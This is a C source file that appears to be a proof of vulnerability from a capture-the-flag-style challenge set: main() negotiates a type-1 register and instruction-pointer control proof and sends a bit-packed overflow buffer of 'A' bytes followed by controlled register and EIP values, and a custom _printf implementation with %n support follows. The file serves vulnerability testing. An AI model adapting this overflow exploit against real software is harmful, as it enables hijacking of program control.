int main(void) {
negotiate_type1(0xfefefefe, 0xfefefefe, 5);
int i, buf_len = 0;
char buf[32], *pbuf;
unsigned char exploit[4096];
unsigned char *eip = NULL, *reg = NULL;
unsigned int eip_len = 0, reg_len = 0, exp_len = 0;
char *key = " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";
transmit_all(STDOUT, "2\n", 2);
transmit_all(STDOUT, key, 95);
eip = append_var("TYPE1_IP", eip, &eip_len);
reg = append_var("TYPE1_REG", reg, ®_len);
memset(exploit, 0, sizeof(exploit));
bio_t *bio = bit_new(exploit);
for (i = 0; i < 2316; ++i)
{
bit_write(bio, '\x00', 1);
bit_write(bio, '\x41', 8);
}
for (i = 0; i < 4; ++i)
{
bit_write(bio, '\x00', 1);
bit_write(bio, reg[i], 8);
}
for (i = 0; i < 4; ++i)
{
bit_write(bio, '\x00', 1);
bit_write(bio, eip[i], 8);
}
exp_len = bio->didx + !!(bio->bidx > 0);
pbuf = _print_signed(buf + 32, &buf_len, exp_len + 4);
transmit_all(STDOUT, pbuf, buf_len);
transmit_all(STDOUT, "\n", 1);
buf_len = 2316 + 4 + 4;
transmit_all(STDOUT, (char *)&buf_len, 4);
transmit_all(STDOUT, exploit, exp_len);
return 0;
}
static int _printf(consumer_t consumer, void *arg, const char *fmt, va_list ap)
{
char tmpbuf[32]; /* must be at least 32 bytes for _print_base */
const char *fmtstr = NULL;
char modifier = 0;
int n, total = 0;
#define CONSUME(b, c) \
do { \
size_t tmp = (size_t)(c); \
if (tmp == 0) break; \
total += (n = consumer(arg, (b), tmp)); \
if (n < 0) goto error; \
if (n < tmp) goto done; \
} while (0)
#define FLUSH() \
do { \
if (fmtstr) { \
CONSUME(fmtstr, fmt-fmtstr); \
fmtstr = NULL; \
} \
} while (0)
while (*fmt)
{
int flags = 0;
#define FLAG_ZERO_PADDING 0x01
unsigned int field_width = 0;
if (*fmt != '%')
{
if (fmtstr == NULL)
fmtstr = fmt;
fmt++;
continue;
}
FLUSH();
fmt++;
if (*fmt == '%')
{
CONSUME(fmt, 1);
fmt++;
continue;
}
/* process flags */
while (1)
{
switch (*fmt)
{
case '0':
flags |= FLAG_ZERO_PADDING;
fmt++;
break;
default:
goto flags_done;
}
}
flags_done:
/* process field width */
field_width = strtoul(fmt, (char **)&fmt, 10);
/* process modifiers */
switch (*fmt)
{
case 'H':
case 'h':
case 'l':
modifier = *fmt;
fmt++;
break;
}
/* process conversion */
char *tmpstr;
int base, outlen, sv;
unsigned int uv;
void *pv;
switch(*fmt)
{
case 'd':
case 'i':
sv = va_arg(ap, int);
if (modifier == 'h') sv = (short)(sv & 0xffff);
else if (modifier == 'H') sv = (signed char)(sv & 0xff);
tmpstr = _print_signed(tmpbuf + 32, &outlen, sv);
while (field_width > outlen)
{
CONSUME((flags & FLAG_ZERO_PADDING) ? "0" : " ", 1);
field_width--;
}
CONSUME(tmpstr, outlen);
fmt++;
break;
case 'u':
case 'o':
case 'x':
case 'X':
if (*fmt == 'u') base = 10;
else if(*fmt == 'o') base = 8;
else base = 16;
uv = va_arg(ap, unsigned int);
if (modifier == 'h') uv &= 0xffff;
else if (modifier == 'H') uv &= 0xff;
tmpstr = _print_base(tmpbuf + 32, &outlen, uv, base, *fmt == 'X');
while (field_width > outlen)
{
CONSUME((flags & FLAG_ZERO_PADDING) ? "0" : " ", 1);
field_width--;
}
CONSUME(tmpstr, outlen);
fmt++;
break;
case 'n':
pv = va_arg(ap, void *);
if (modifier == 'h') *(short int *)pv = total;
else if (modifier == 'H') *(signed char *)pv = total;
else *(int *)pv = total;
fmt++;
break;
case 's':
pv = va_arg(ap, void *);
CONSUME((char *)pv, cgc_strlen((char *)pv));
fmt++;
break;
}
}
FLUSH();
done:
return total;
error:
return -1;
}
